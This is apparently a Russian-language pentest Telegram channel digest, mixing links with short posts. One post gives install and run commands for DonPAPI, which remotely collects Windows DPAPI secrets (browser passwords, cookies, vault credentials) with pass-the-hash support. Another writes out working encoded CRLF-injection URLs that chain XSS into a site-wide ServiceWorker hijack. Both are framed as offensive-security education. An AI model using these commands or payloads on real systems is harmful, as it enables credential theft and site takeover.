Fsecurity | HH

Наш Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

С днем рождения DAMAGELAB / XSS 20 лет как никак 😎

⌨️ DonPAPI v2.1.0 DPAPI (Data Protection API) - крипто интерфейс в 💻Windows, который обеспечивает программам шифрование их сохраненных данных (пароли, cookie, токены и т.д.) Данный инструмент позволяет забрать необходимые данные удаленно, написан на 🐍 Собираемые данные:

Chromium браузеры Windows сертификаты Диспетчер УД (Credential Manager) Firefox Mobaxterm MRemoteNg RDC Manager SCCM Vaults VNC

Установка/Запуск:

pipx install donpapi

pipx run donpapi collect -u admin -p 'Password' -d domain.local -t ALL

GUI для просмотра собранных данных:

pipx run donpapi gui

http://127.0.0.1:8088

Поддерживает аутентификацию Kerberos, Pass The Hash -k --hashes --aesKey 🖥 Home 🔠 Секреты DPAPI #python #donpapi #soft #dpapi ✈️ Pentest HaT 🎩

Telegram-Android * Partisan-style. source

🔗Ссылка: https://habr.com/ru/articles/855906/

Наш Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://proglib.io/sh/Pn5EG0IHgF

Ну и раз я вспомнил что у меня есть Telegram канал - нужно запостить что-то полезное) Если вы обнаружили CRLF Injection, которая позволяет перезаписать HTTP ответ и сделать XSS, - то ее импакт можно увеличить с помощью ServiceWorker. Для регистрации ServiceWorker необходимо: 1) Иметь возможность выполнения JavaScript в контексте сайта 2) Наличие JavaScript файла на сервере с корректным Content-Type Используя CRLF Injection оба этих условия легко выполняются: XSS

https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/html%0D%0AContent-Length:20%0D%0A%0D%0A<script>XSS</script>

JS файл

https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/javascript%0D%0AContent-Length:7%0D%0A%0D%0AJS_file

Но остается проблема, что запросы, которые контролируются ServiceWorker, будут ограничены его scope. То есть папкой, в которой у нас сработала CRLF Injection. В данном случае это /some/path/foo/bar/, что не очень интересно. Но если почитать документацию, то можно узнать о заголовке Service-Worker-Allowed, который устанавливается в HTTP ответе вместе с JS кодом воркера, и через который можно переопределить scope. Что в случае с CRLF Injection позволяет зарегистрировать ServiceWorker, расположенный в любой папке, на корень сайта. Для этого формируем код ServiceWorker с Service-Worker-Allowed:/, который подменяет все HTTP ответы на строку Fake response.

https://example.tld/some/path/foo/bar/?param=x%0D%0AService-Worker-Allowed:/%0D%0AContent-Type:text/javascript%0D%0AContent-Length:162%0D%0A%0D%0Aself.addEventListener(%22fetch%22,function(event){event.respondWith(new%20Response(%22Fake%20response%22,{status:200,statusText:%22OK%22,headers:{%22Content-Type%22:%22text/html%22}}))})

И подключаем его через XSS.

https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/html%0D%0AContent-Length:378%0D%0A%0D%0A%3Cscript%3Enavigator.serviceWorker.register('/some/path/foo/bar/?param=x%250D%250AService-Worker-Allowed:/%250D%250AContent-Type:text/javascript%250D%250AContent-Length:162%250D%250A%250D%250Aself.addEventListener(%2522fetch%2522,function(event){event.respondWith(new%2520Response(%2522Fake%2520response%2522,{status:200,statusText:%2522OK%2522,headers:{%2522Content-Type%2522:%2522text/html%2522}}))})',{scope:'/'})%3C/script%3E

Также иногда бывает, что не получается сформировать валидный JS ограничивая HTTP ответ по длине с помощью Content-Length. В таком случае можно отбросить лишнее в ответе с помощью формирования HTTP ответа с Transfer-Encoding:chunked.

https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/javascript%0D%0ATransfer-Encoding:chunked%0D%0A%0D%0A7%0D%0AJS_file%0D%0A0%0D%0A%0D%0A

🖥 neohtop — это современная кроссплатформенная утилита для мониторинга системы, созданная с использованием Svelte, Rust и Tauri! 🌟 Она расширяет возможности классического htop, предлагая современный интерфейс с темной и светлой темами, мониторинг CPU и памяти в реальном времени, поиск и фильтрацию процессов, управление процессами (включая их завершение), а также автообновление системной статистики. 🔐 Лицензия: MIT 🖥 Github @linuxkalii

🔗Ссылка: https://habr.com/ru/companies/ruvds/articles/853996/

🔗Ссылка: https://www.landh.tech/blog/20241028-hidden-supply-chain-links/

🔗Ссылка: https://habr.com/ru/companies/swordfish_security/articles/857302/

🔗Ссылка: https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/falshivyj-attach-ataki-na-pochtovye-servery-roundcube-s-ispolzovaniem-uyazvimosti-cve-2024-37383/#id1

🔗Ссылка: https://github.com/dwisiswant0/ppfuzz

Наш Discord сервер 👆🏻Тут можно пообщаться, попросить помощи и найти много полезной информации 🦈

sshd CTF * Крутая CTF с нашумевшим XZ Utils backdoor. Все в наличии: liblzma, шеллкодесы, encrypt/decrypt и вот это вот все. * ТЫЦ #ctf

🔗Ссылка: https://blog.intigriti.com/hacking-tools/a-beginner-s-roadmap-for-playing-ctfs-10-practical-tips-for-beginners

🎯 Pentest-Ground Площадка с заведомо уязвимыми веб-приложениями и сетевыми сервисами. Можно использовать для проверки эффективности инструментов поиска уязвимостей или в образовательных целях Поднятые лаборатории:

Damn Vulnerable Web Application - классическое веб приложение Damn Vulnerable GraphQL Application - GraphQL RestFlaw - REST API ShadowLogic - WebLogic CipherHeart - Redis GuardianLeaks - веб приложение

Реверт лаб происходит каждые 30 минут 🔗 Pentest-Ground ▶️ P.S. Бонусом - FVWA (Flask Vulnerable Web Application) #pentest #training #dvwa #pentestground #graphql ✈️ Pentest HaT 🎩

🔗Ссылка: https://www.securitylab.ru/news/553780.php